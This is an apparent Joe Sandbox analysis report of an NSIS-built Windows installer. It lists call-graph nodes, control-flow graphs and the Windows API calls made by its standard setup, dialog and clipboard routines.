lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3871 4038af #17 SetErrorMode OleInitialize 3872 406328 3 API calls 3871->3872 3873 4038f2 SHGetFileInfoW 3872->3873 3945 406035 lstrcpynW 3873->3945 3875 40391d GetCommandLineW 3946 406035 lstrcpynW 3875->3946 3877 40392f GetModuleHandleW 3878 403947 3877->3878 3879 405d32 CharNextW 3878->3879 3880 403956 CharNextW 3879->3880 3891 403968 3880->3891 3881 403a02 3882 403a21 GetTempPathW 3881->3882 3947 4037f8 3882->3947 3884 403a37 3886 403a3b GetWindowsDirectoryW lstrcatW 3884->3886 3887 403a5f DeleteFileW 3884->3887 3885 405d32 CharNextW 3885->3891 3889 4037f8 11 API calls 3886->3889 3955 4035b3 GetTickCount GetModuleFileNameW 3887->3955 3892 403a57 3889->3892 3890 403a73 3893 403af8 3890->3893 3895 405d32 CharNextW 3890->3895 3931 403add 3890->3931 3891->3881 3891->3885 3898 403a04 3891->3898 3892->3887 3892->3893 4040 403885 3893->4040 3899 403a8a 3895->3899 4047 406035 lstrcpynW 3898->4047 3910 403b23 lstrcatW lstrcmpiW 3899->3910 3911 403ab5 3899->3911 3900 403aed 3903 406113 9 API calls 3900->3903 3901 403bfa 3904 403c7d 3901->3904 3906 406328 3 API calls 3901->3906 3902 403b0d 3905 405ccc MessageBoxIndirectW 3902->3905 3903->3893 3907 403b1b ExitProcess 3905->3907 3909 403c09 3906->3909 3913 406328 3 API calls 3909->3913 3910->3893 3912 403b3f CreateDirectoryW SetCurrentDirectoryW 3910->3912 4048 4067aa 3911->4048 3915 403b62 3912->3915 3916 403b57 3912->3916 3917 403c12 3913->3917 4065 406035 lstrcpynW 3915->4065 4064 406035 lstrcpynW 3916->4064 3921 406328 3 API calls 3917->3921 3924 403c1b 3921->3924 3923 403b70 4066 406035 lstrcpynW 3923->4066 3925 403c69 ExitWindowsEx 3924->3925 3930 403c29 GetCurrentProcess 3924->3930 3925->3904 3929 403c76 3925->3929 3926 403ad2 4063 406035 lstrcpynW 3926->4063 3932 40141d 80 API calls 3929->3932 3934 403c39 3930->3934 3983 405958 3931->3983 3932->3904 3933 406831 18 API calls 3935 403b98 DeleteFileW 3933->3935 3934->3925 3936 403ba5 CopyFileW 3935->3936 3942 403b7f 3935->3942 3936->3942 3937 403bee 3938 406c94 42 API calls 3937->3938 3940 403bf5 3938->3940 3939 406c94 42 API calls 3939->3942 3940->3893 3941 406831 18 API calls 3941->3942 3942->3933 3942->3937 3942->3939 3942->3941 3944 403bd9 CloseHandle 3942->3944 4067 405c6b CreateProcessW 3942->4067 3944->3942 3945->3875 3946->3877 3948 406064 5 API calls 3947->3948 3949 403804 3948->3949 3950 40380e 3949->3950 3951 40674e 3 API calls 3949->3951 3950->3884 3952 403816 CreateDirectoryW 3951->3952 4070 405eab 3952->4070 4074 405e7c GetFileAttributesW CreateFileW 3955->4074 3957 4035f3 3977 403603 3957->3977 4075 406035 lstrcpynW 3957->4075 3959 403619 4076 40677d lstrlenW 3959->4076 3963 40362a GetFileSize 3964 403726 3963->3964 3978 403641 3963->3978 4081 4032d2 3964->4081 3966 40372f 3968 40376b GlobalAlloc 3966->3968 3966->3977 4093 403368 SetFilePointer 3966->4093 3967 403336 ReadFile 3967->3978 4092 403368 SetFilePointer 3968->4092 3971 4037e9 3974 4032d2 6 API calls 3971->3974 3972 403786 3975 40337f 33 API calls 3972->3975 3973 40374c 3976 403336 ReadFile 3973->3976 3974->3977 3981 403792 3975->3981 3980 403757 3976->3980 3977->3890 3978->3964 3978->3967 3978->3971 3978->3977 3979 4032d2 6 API calls 3978->3979 3979->3978 3980->3968 3980->3977 3981->3977 3981->3981 3982 4037c0 SetFilePointer 3981->3982 3982->3977 3984 406328 3 API calls 3983->3984 3985 40596c 3984->3985 3986 405972 3985->3986 3987 405984 3985->3987 4107 405f7d wsprintfW 3986->4107 3988 405eff 3 API calls 3987->3988 3989 4059b5 3988->3989 3991 4059d4 lstrcatW 3989->3991 3993 405eff 3 API calls 3989->3993 3992 405982 3991->3992 4098 403ec1 3992->4098 3993->3991 3996 4067aa 18 API calls 3997 405a06 3996->3997 3998 405a9c 3997->3998 4000 405eff 3 API calls 3997->4000 3999 4067aa 18 API calls 3998->3999 4001 405aa2 3999->4001 4002 405a38 4000->4002 4003 405ab2 4001->4003 4004 406831 18 API calls 4001->4004 4002->3998 4006 405a5b lstrlenW 4002->4006 4009 405d32 CharNextW 4002->4009 4005 405ad2 LoadImageW 4003->4005 4109 403ea0 4003->4109 4004->4003 4007 405b92 4005->4007 4008 405afd RegisterClassW 4005->4008 4010 405a69 lstrcmpiW 4006->4010 4011 405a8f 4006->4011 4015 40141d 80 API calls 4007->4015 4013 405b9c 4008->4013 4014 405b45 SystemParametersInfoW CreateWindowExW 4008->4014 4016 405a56 4009->4016 4010->4011 4017 405a79 GetFileAttributesW 4010->4017 4019 40674e 3 API calls 4011->4019 4013->3900 4014->4007 4020 405b98 4015->4020 4016->4006 4021 405a85 4017->4021 4018 405ac8 4018->4005 4022 405a95 4019->4022 4020->4013 4023 403ec1 19 API calls 4020->4023 4021->4011 4024 40677d 2 API calls 4021->4024 4108 406035 lstrcpynW 4022->4108 4026 405ba9 4023->4026 4024->4011 4027 405bb5 ShowWindow LoadLibraryW 4026->4027 4028 405c38 4026->4028 4029 405bd4 LoadLibraryW 4027->4029 4030 405bdb GetClassInfoW 4027->4030 4031 405073 83 API calls 4028->4031 4029->4030 4032 405c05 DialogBoxParamW 4030->4032 4033 405bef GetClassInfoW RegisterClassW 4030->4033 4034 405c3e 4031->4034 4037 40141d 80 API calls 4032->4037 4033->4032 4035 405c42 4034->4035 4036 405c5a 4034->4036 4035->4013 4039 40141d 80 API calls 4035->4039 4038 40141d 80 API calls 4036->4038 4037->4013 4038->4013 4039->4013 4041 40389d 4040->4041 4042 40388f CloseHandle 4040->4042 4116 403caf 4041->4116 4042->4041 4047->3882 4169 406035 lstrcpynW 4048->4169 4050 4067bb 4051 405d85 4 API calls 4050->4051 4052 4067c1 4051->4052 4053 406064 5 API calls 4052->4053 4060 403ac3 4052->4060 4056 4067d1 4053->4056 4054 406809 lstrlenW 4055 406810 4054->4055 4054->4056 4058 40674e 3 API calls 4055->4058 4056->4054 4057 406301 2 API calls 4056->4057 4056->4060 4061 40677d 2 API calls 4056->4061 4057->4056 4059 406816 GetFileAttributesW 4058->4059 4059->4060 4060->3893 4062 406035 lstrcpynW 4060->4062 4061->4054 4062->3926 4063->3931 4064->3915 4065->3923 4066->3942 4068 405ca6 4067->4068 4069 405c9a CloseHandle 4067->4069 4068->3942 4069->4068 4071 405eb8 GetTickCount GetTempFileNameW 4070->4071 4072 40382a 4071->4072 4073 405eee 4071->4073 4072->3884 4073->4071 4073->4072 4074->3957 4075->3959 4077 40678c 4076->4077 4078 406792 CharPrevW 4077->4078 4079 40361f 4077->4079 4078->4077 4078->4079 4080 406035 lstrcpynW 4079->4080 4080->3963 4082 4032f3 4081->4082 4083 4032db 4081->4083 4086 403303 GetTickCount 4082->4086 4087 4032fb 4082->4087 4084 4032e4 DestroyWindow 4083->4084 4085 4032eb 4083->4085 4084->4085 4085->3966 4089 403311 CreateDialogParamW ShowWindow 4086->4089 4090 403334 4086->4090 4094 40635e 4087->4094 4089->4090 4090->3966 4092->3972 4093->3973 4095 40637b PeekMessageW 4094->4095 4096 406371 DispatchMessageW 4095->4096 4097 403301 4095->4097 4096->4095 4097->3966 4099 403ed5 4098->4099 4114 405f7d wsprintfW 4099->4114 4101 403f49 4102 406831 18 API calls 4101->4102 4103 403f55 SetWindowTextW 4102->4103 4104 403f70 4103->4104 4105 403f8b 4104->4105 4106 406831 18 API calls 4104->4106 4105->3996 4106->4104 4107->3992 4108->3998 4115 406035 lstrcpynW 4109->4115 4111 403eb4 4112 40674e 3 API calls 4111->4112 4113 403eba lstrcatW 4112->4113 4113->4018 4114->4101 4115->4111 4117 403cbd 4116->4117 4118 4038a2 4117->4118 4119 403cc2 FreeLibrary GlobalFree 4117->4119 4120 406cc7 4118->4120 4119->4118 4119->4119 4121 4067aa 18 API calls 4120->4121 4122 406cda 4121->4122 4123 406ce3 DeleteFileW 4122->4123 4124 406cfa 4122->4124 4163 4038ae CoUninitialize 4123->4163 4125 406e77 4124->4125 4167 406035 lstrcpynW 4124->4167 4131 406301 2 API calls 4125->4131 4151 406e84 4125->4151 4125->4163 4127 406d25 4128 406d39 4127->4128 4129 406d2f lstrcatW 4127->4129 4132 40677d 2 API calls 4128->4132 4130 406d3f 4129->4130 4134 406d4f lstrcatW 4130->4134 4136 406d57 lstrlenW FindFirstFileW 4130->4136 4133 406e90 4131->4133 4132->4130 4137 40674e 3 API calls 4133->4137 4133->4163 4134->4136 4135 4062cf 11 API calls 4135->4163 4140 406e67 4136->4140 4164 406d7e 4136->4164 4138 406e9a 4137->4138 4141 4062cf 11 API calls 4138->4141 4139 405d32 CharNextW 4139->4164 4140->4125 4142 406ea5 4141->4142 4143 405e5c 2 API calls 4142->4143 4144 406ead RemoveDirectoryW 4143->4144 4148 406ef0 4144->4148 4149 406eb9 4144->4149 4145 406e44 FindNextFileW 4147 406e5c FindClose 4145->4147 4145->4164 4147->4140 4150 404f9e 25 API calls 4148->4150 4149->4151 4152 406ebf 4149->4152 4150->4163 4151->4135 4154 4062cf 11 API calls 4152->4154 4153 4062cf 11 API calls 4153->4164 4155 406ec9 4154->4155 4158 404f9e 25 API calls 4155->4158 4156 406cc7 72 API calls 4156->4164 4157 405e5c 2 API calls 4159 406dfa DeleteFileW 4157->4159 4160 406ed3 4158->4160 4159->4164 4161 406c94 42 API calls 4160->4161 4161->4163 4162 404f9e 25 API calls 4162->4145 4163->3901 4163->3902 4164->4139 4164->4145 4164->4153 4164->4156 4164->4157 4164->4162 4165 404f9e 25 API calls 4164->4165 4166 406c94 42 API calls 4164->4166 4168 406035 lstrcpynW 4164->4168 4165->4164 4166->4164 4167->4127 4168->4164 4169->4050 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                    • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427DC1,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                  • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                  • API String ID: 2110491804-1641061399
                                                                                                                                                                                  • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                  • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                  Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                  • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                  • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                  • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                  • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                  • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                  • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                  • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                  • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
